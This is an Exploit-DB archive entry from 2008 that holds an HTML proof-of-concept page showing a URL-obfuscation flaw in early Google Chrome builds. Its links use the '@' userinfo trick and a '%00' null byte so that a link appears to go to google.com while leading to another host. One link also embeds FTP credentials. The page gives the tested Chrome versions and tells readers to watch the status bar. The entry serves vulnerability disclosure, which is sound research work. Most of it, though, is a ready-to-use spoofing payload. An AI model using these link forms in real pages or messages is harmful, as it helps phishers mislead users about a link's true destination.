Google Chrome - MetaCharacter URI Obfuscation

EDB-ID:

7226

CVE:





Platform:

Windows

Date:

2008-11-25


<html>
<title>Google Chrome MetaCharacter URI Obfuscation Vulnerability.</title>
<head></head>

<body><br><br>
<h2><center>Google Chrome MetaCharacter URI Obfuscation Vulnerability.<br><br>(C) SecNiche Security / Proof of Concept</br></br> </center></h2>


<center>
<b>By:- Aditya K Sood.</b><br><br>
<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical dependent on the object usage.<br><br>

Check the Status Bar for Address Problem. Have a Look at the Source too.</b></br></br>
<hr></hr>

<b><a href="http://bothack.wordpress.com/2006/07/25/url-obfuscation/"> The Indepth Concept of this Vulnerablility.</a></b>
<h2> Look at POC.</h2>
<b>Link1 : <a href="http://www.google.com%00@milw0rm.com">http://www.google.com%00@milw0rm.com </a> <br><br>
Link2 : <a href="http://www.google.com@yahoo.com">http://www.google.com@yahoo.com</a><br><br>

Link3 : <a href="ftp://anoymous:guest@microsoft.com">ftp://anoymous:guest@microsoft.com</a><br><br>
</b>
<b>Check the Status Bar for Address Problem,</b></br></br>
<hr></hr>
<b><center>
<h1> Specifcally Tested on 0.4.154.25 [Latest]</h1>
</center>
<hr></hr>
<b>Other Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</center>
</body>


</html>

# milw0rm.com [2008-11-25]